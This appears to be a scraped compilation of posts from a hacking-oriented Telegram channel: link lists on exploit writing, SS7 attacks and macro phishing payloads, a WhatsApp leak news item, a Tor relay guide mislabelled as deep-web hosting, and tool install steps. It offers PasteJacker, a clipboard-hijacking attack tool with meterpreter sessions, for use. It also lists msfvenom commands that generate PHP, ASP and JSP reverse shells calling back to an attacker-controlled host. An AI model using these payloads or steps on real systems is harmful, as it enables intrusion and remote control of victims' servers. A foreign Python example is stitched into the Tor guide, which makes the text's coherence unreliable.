UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ ｕ𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

#Exploit Development References

🦑 Tutorials and Examples :

* [Shellcode Tutorial](http://www.vividmachines.com/shellcode/shellcode.html)

* [Shellcode Examples](http://shell-storm.org/shellcode/)

* [Exploit Writing Tutorials](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)

* [Exploit Exercises](https://exploit-exercises.com/)

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
🦑 SIM CARD GSM SOFTWARE FREE :

> This is the source code for the pySimReader application.

> It requires a PCSC compatible SIM reader to be attached to the computer.


> The main product page is here: http://twhiteman.netfirms.com/pySIM.html

(You can download the Windows installer from here: https://github.com/toddw-as/SimReader/blob/master/installer/pySimReader_v14_setup.exe?raw=true )

> The application uses Python for the user interface and data processing, as well as a binary Python module (DLL) to utilize the Microsoft SmartCard Base Component APIs (note that if I were to rewrite this code today, I'd probably utilize Python ctypes instead of this wrapper library - as that would simplify the build process - removing the Microsoft Visual Studio and Swig dependencies).


#Requested
✅
Forwarded from UNDERCODE SECURITY

🦑 #GSM & #SS7 Pentesting

- [Introduction to GSM Security](http://www.pentestingexperts.com/introduction-to-gsm-security/)

- [GSM Security 2](https://www.ehacking.net/2011/02/gsm-security-2.html)

- [vulnerabilities in GSM security with USRP B200](https://ieeexplore.ieee.org/document/7581461/)

- [Security Testing 4G (LTE) Networks](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-44con-lte-presentation-2012-09-11.pdf)

- [Case Study of SS7/SIGTRAN Assessment](https://nullcon.net/website/archives/pdf/goa-2017/case-study-of-SS7-sigtran.pdf)

- [Telecom Signaling Exploitation Framework - SS7, GTP, Diameter & SIP](https://github.com/SigPloiter/SigPloit)

- [ss7MAPer – an SS7 pen testing toolkit](https://n0where.net/ss7-pentesting-toolkit-ss7maper)

- [Introduction to SIGTRAN and SIGTRAN Licensing](https://www.youtube.com/watch?v=XUY6pyoRKsg)

- [SS7 Network Architecture](https://youtu.be/pg47dDUL1T0)

- [Introduction to SS7 Signaling](https://www.patton.com/whitepapers/Intro_to_SS7_Tutorial.pdf)

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking

🦑 WhatsApp vulnerability exposed users' mobile numbers :

> A security researcher revealed that WhatsApp discovered a bug that allowed users' mobile numbers to be exposed on the Google search engine. Although not all users' numbers have been exposed, this issue has caused their concern. However, if the user has only talked to a WhatsApp user he knows (the group invitation link has not been used), there is a high probability that he will not be affected by this vulnerability.

Author: Content reprint Date: 2020-06-09 Category: Vulnerability event


> Athul Jayaram, a security researcher, said that WhatsApp executives are aware of the problem, but are indifferent to it. It is reported that the issue is related to the WhatsApp QR code feature launched earlier this year.

> WhatsApp's previously released group invite link works differently than the new QR code feature, but the former is obviously more secure, because the latter uses the unencrypted http://wa.me/ short URL system, and the user's phone number is not hidden in the link.

> When a user shares a QR code on the new system, if the URL is crawled by a Google crawler, it will most likely be included in the search engine's index results. If you are worried about your number being accidentally received, please search and verify it via site:wa.me + country code.

> Currently, if searched through site:api.whatsapp.com, the Google search engine will also return thousands of search results. But unless the WhatsApp executives face the problem squarely, the negative impact of this matter will certainly continue.

@UndercodeNews

🦑 Hacking systems with the automation of PasteJacking attacks :
> In short, Pastejacking is a method that malicious websites employ to take control of your computer's clipboard and change its content to something harmful without your knowledge. From The Windows Club definition

> So what I did here is automate the original attack and add two other tricks to fool the user, using HTML and CSS. I will talk about it, then I added meterpreter sessions as I said before.

INSTALLATION & RUN :

1️⃣ git clone https://github.com/D4Vinci/PasteJacker.git

2️⃣ sudo python3 -m pip install ./PasteJacker

3️⃣ sudo pastejacker

🦑 Requirements :

1️⃣ Python 3 and setuptools module.

2️⃣ Linux or Unix-based system (currently tested only on Kali Linux rolling and Ubuntu 16.04).

3️⃣ Third-party requirements like msfvenom, but only if you are going to use the msfvenom option, of course.

4️⃣ Third-party library ncurses-dev for Ubuntu.

5️⃣ Root access.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Forwarded from UNDERCODE SECURITY

🦑 #Sandboxing/Reversing tools 2020 used by pro hackers :

[Cuckoo](https://github.com/cuckoobox) - Open Source highly configurable sandboxing tool

Cuckoo-modified - Heavily modified Cuckoo fork developed by community

[Cuckoo-modified-api](https://github.com/keithjjones/cuckoo-modified-api) - A Python library to control a cuckoo-modified sandbox

Hybrid-Analysis - Hybrid-Analysis is a free powerful online sandbox by Payload Security

[Malwr](https://malwr.com) - Malwr is a free online malware analysis service and community, which is powered by the Cuckoo Sandbox

Mastiff - MASTIFF is a static analysis framework that automates the process of extracting key characteristics from a number of different file formats

[Metadefender Cloud](https://www.metadefender.com) - Metadefender is a free threat intelligence platform providing multiscanning, data sanitization and vulnerability assessment of files

Virustotal - Virustotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners



> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking

🦑 Dump the memory contents of a process to a file without stopping the process :

INSTALLATION & RUN :

1️⃣ Download : https://vidstromlabs.com/downloads/pmdump.exe

2️⃣ You now have a pmdump.exe file in your Downloads folder

3️⃣ Open cmd and change into that directory with cd.
In this case, your file path is C:\Program Files\Downloads\

4️⃣ In cmd, from C:\Program Files\Downloads\, type: start pmdump.exe

( FOR DETAILS ON HOW TO RUN AN .EXE IN CMD WITH PICTURES GO TO
https://www.wikihow.com/Run-an-EXE-File-From-Command-Prompt )

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Forwarded from Backup Legal Mega

🦑 HOW TO CREATE & HOST A DEEP WEB SITE By Undercode :

> Become a volunteer against Internet tracking: how to build Tor (Onion Network) nodes:

1️⃣ Preparation

If you plan to build a non-exit relay, that is, an entry node (guard relay) or a middle node (middle relay), then you need to prepare:

1) A server with at least 512MB of memory; basically any still-usable PC can meet the requirements, but a VPS or hosting is recommended;

2) Stable Internet access with at least 10Mbps of bandwidth, and a public IPv4 address that can be kept for at least a few hours (a fixed IP address is recommended). In addition, if the ISP provides an IPv6 address, don't forget to add it, because Tor badly needs IPv6 nodes (currently, pure IPv6 is not supported);

3) At least 2 hours of operation time per day; 24-hour operation is recommended;

4) Elementary system maintenance skills and the ability to use a text editor (such as vi).

If you plan to set up an exit node, the situation becomes more complicated, because the exit node is responsible for the traffic of Tor users (the destination server will see the exit node's IP as the user accessing it). Because of Tor's strong anonymity, a lot of pirated P2P downloads, network attacks and spam are launched through Tor, and you cannot completely prevent them from passing through your exit node. Therefore, there are some additional requirements for setting up an exit node:

1) A server, VPS or cloud host dedicated to the exit node, which should not run other network services;

2) The ISP must allow exit nodes to be set up (see the list of the attitudes of various VPS and hosting providers to Tor); generally data centers, universities and non-profit organizations are suitable, and never set up an exit node in your own home or company;

3) A fixed public IPv4 address dedicated to the exit node, on which no other network services should run (again, if the ISP provides an IPv6 address, don't forget to add it during configuration);

4) (Optional) The ISP can provide customized WHOIS and rDNS information to avoid some trouble;

5) Some energy to deal with abuse letters, such as DMCA complaints; otherwise the service may be shut down by the ISP or you may face legal issues.

6) Most Tor nodes run on the Linux (mainly Debian) operating system, but the Tor Project advocates diversity, so using a BSD operating system to build Tor nodes is also welcome.
2️⃣ Installation :

1) Debian is used as an example here. For configuration methods under other operating systems, please refer to the Tor Project's documentation.

2) Execute the following command in the terminal to install the Tor server (requires sudo or operate under the root user, the same below):

> apt update && apt install tor

3️⃣ Configuration :
Tor's configuration file is named "torrc" and is located in /etc/tor.

> Use a text editor to open it:

> vi /etc/tor/torrc
You will find that a lot of the file's content is commented out (lines starting with "#"); you can uncomment the required parameters to make them effective, or write the required parameters at the end of the file.

🦑 A typical configuration file must have the following basic parameters:

Nickname Undercode-Testing
ORPort 9001
ORPort [IPv6-address]:9001
ExitRelay 0
IPv6Exit 0
SocksPort 0
ControlSocket 0
ContactInfo name@domain
VPS or leased servers often have traffic limits. You can avoid exhausting the allowance prematurely by controlling bandwidth and Tor's running time:

1) AccountingMax N bytes|KBytes|MBytes|GBytes|TBytes|KBits|MBits|GBits|TBits
AccountingStart day|week|month [day] HH:MM

2) Please note that a fast node that is online only part of the time is more useful than a node that runs continuously at low speed. In addition, the Tor network automatically adjusts the workload assigned to a node through its consensus weight (mentioned later), which helps extend the node's working hours.

3) If this is an exit node, it is recommended to configure the outbound rules (exit policy), which determine which ports on other hosts on the Internet the exit node can reach. Careful configuration of outbound rules can prevent the node from being abused by attackers. For example, forbidding port 3389 prevents the node from being used for remote desktop brute-force attacks. Of course, if you want to minimize abuse letters, you can open only ports 80 and 443 and provide just the most basic web browsing service for Tor Browser users.

4) The outbound rule configuration parameters are as follows (wildcards can be used for both address and port):

ExitPolicy accept *:port
ExitPolicy reject *:port
ExitPolicy accept *:*
ExitPolicy reject *:*

If you do not configure the outbound rules but only turn on the exit node switch, Tor will use the following default rules:

reject 0.0.0.0/8:*
reject 169.254.0.0/16:*
reject 127.0.0.0/8:*
reject 192.168.0.0/16:*
reject 10.0.0.0/8:*
reject 172.16.0.0/12:*
reject self-ip:*
reject *:25
reject *:119
reject *:135-139
reject *:445
reject *:563
reject *:1214
reject *:4661-4666
reject *:6346-6429
reject *:6699
reject *:6881-6999
accept *:*

🦑 After editing, save and exit the text editor, then execute the following command to restart Tor:

systemctl restart tor@default
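Before restarting the relay it is worth checking what a candidate exit policy actually permits, because Tor evaluates ExitPolicy lines top to bottom and the first matching line decides. The following Python script is an added example, not part of the Undercode guide and not Tor's own code: it parses the default policy listed above and the "ports 80 and 443 only" policy the guide suggests, and evaluates destinations against them with first-match semantics. The relay address 203.0.113.10 standing in for self-ip is an assumed placeholder, and only the syntax shown in the guide (IPv4 address or CIDR or *, single port, port range or *) is handled.

```python
"""Evaluate torrc ExitPolicy rules the way Tor does: first match wins,
with an implicit trailing "accept *:*" if nothing matches.

Added example for the guide above; not Tor Project code.
"""
import ipaddress

# Placeholder relay address substituted for "self-ip" (assumed for this example).
RELAY_IP = "203.0.113.10"

# Tor's default exit policy, exactly as listed in the guide (constructed input).
DEFAULT_POLICY = """
reject 0.0.0.0/8:*
reject 169.254.0.0/16:*
reject 127.0.0.0/8:*
reject 192.168.0.0/16:*
reject 10.0.0.0/8:*
reject 172.16.0.0/12:*
reject self-ip:*
reject *:25
reject *:119
reject *:135-139
reject *:445
reject *:563
reject *:1214
reject *:4661-4666
reject *:6346-6429
reject *:6699
reject *:6881-6999
accept *:*
"""

# The restrictive "web browsing only" policy the guide recommends for
# operators who want to minimise abuse complaints (constructed input).
WEB_ONLY_POLICY = """
ExitPolicy accept *:80
ExitPolicy accept *:443
ExitPolicy reject *:*
"""


def parse_policy(text, self_ip=RELAY_IP):
    """Parse policy lines into (action, network, port_lo, port_hi) tuples.

    Both bare "accept/reject ..." lines (as the default list is usually
    quoted) and full "ExitPolicy accept/reject ..." torrc lines are accepted.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        if parts[0].lower() == "exitpolicy":
            parts = parts[1:]
        if len(parts) != 2 or parts[0] not in ("accept", "reject"):
            raise ValueError("unsupported rule: %r" % raw)
        action, target = parts
        addr, _, port = target.rpartition(":")
        if not addr or not port:
            raise ValueError("rule needs address:port: %r" % raw)
        if addr == "self-ip":
            addr = self_ip
        # None means "*": any address. strict=False lets "1.2.3.4/8" through.
        net = None if addr == "*" else ipaddress.ip_network(addr, strict=False)
        if port == "*":
            lo, hi = 1, 65535
        elif "-" in port:
            lo, hi = (int(p) for p in port.split("-", 1))
        else:
            lo = hi = int(port)
        if not (1 <= lo <= hi <= 65535):
            raise ValueError("bad port range: %r" % raw)
        rules.append((action, net, lo, hi))
    return rules


def evaluate(rules, dest_ip, dest_port):
    """Return "accept" or "reject" for one destination; first match wins."""
    ip = ipaddress.ip_address(dest_ip)
    for action, net, lo, hi in rules:
        if net is not None and ip not in net:
            continue
        if lo <= dest_port <= hi:
            return action
    return "accept"  # Tor's implicit final rule


def report(rules, dest_ip, ports):
    """Map each port to the decision for a single destination address."""
    return {port: evaluate(rules, dest_ip, port) for port in ports}


if __name__ == "__main__":
    probe_ports = [25, 80, 443, 3389, 6900]
    for name, text in (("default", DEFAULT_POLICY), ("web-only", WEB_ONLY_POLICY)):
        rules = parse_policy(text)
        print(name, report(rules, "93.184.216.34", probe_ports))
```

Running the script shows the point the guide makes about port 3389: the default policy still accepts it, while the web-only policy rejects everything except 80 and 443. The same evaluator can be fed your own torrc lines before the `systemctl restart tor@default` step.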
4️⃣ Inspection and maintenance :

1) After the node is set up, you can use the "netstat -an" command to check whether your node's listening port has established TCP connections.

2) In addition, it is recommended to search for your own node in Tor Metrics using its IP address or nickname as the keyword, to check its operating status. There, "Fingerprint" is the unique identity of the node, and "Consensus Weight" is the node's path-selection weight (it depends on bandwidth and on how long the node has been running; the larger the number, the more likely the node is to be selected).

3) If you want to better monitor the node's running status and system resource usage in real time, it is recommended to install nyx :

> apt-get install nyx

> or, via pip: pip install nyx

> After the installation is complete, add the following parameters to the torrc file:

> ControlPort 9051

> CookieAuthentication 1

4) After the configuration is complete, you can start nyx directly in the terminal (note the user rights: with CookieAuthentication the control cookie is readable only by the Tor user or its group), and press the q key twice to exit.


🦑 WRITTEN BY UNDERCODE
CREATE & HOST YOUR OWN DEEPWEBSITE FULL GUIDE @UndercodeTesting

🦑 #Exploits & #Bugs New :


[Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)

CVE-2017-0199 Toolkit


[Window Signed Binary](https://github.com/vysec/Windows-SignedBinary)

Wepwnise

[Bash Bunny](https://hakshop.com/products/bash-bunny)

Generate Macro - Tool

[How To: Empire's Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/)

Excel macros with PowerShell

[PowerPoint and Custom Actions](https://phishme.com/powerpoint-and-custom-actions/)

MS Signed mimikatz in just 3 steps

[Hiding your process from sysinternals](https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/)

Luckystrike: An Evil Office Document Generator

[The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html)

Macro-less Code Exec in MSWord

[Multi-Platform Macro Phishing Payloads](https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)

Macroless DOC malware that avoids detection with Yara rule

[Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/)

Powershell without Powershell to bypass app whitelist

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
SUPPORT & SHARE :

T.me/UndercodeTesting

🦑 Web #Payloads Commands Metasploit



1️⃣ msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php

2️⃣ Creates a Simple TCP Shell for PHP

3️⃣ msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp

4️⃣ Creates a Simple TCP Shell for ASP

5️⃣ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

6️⃣ Creates a Simple TCP Shell for JSP

7️⃣ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war

8️⃣ Creates a Simple TCP Shell for WAR

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking

🦑 Open Source #Threat Intelligence

- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.

- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.

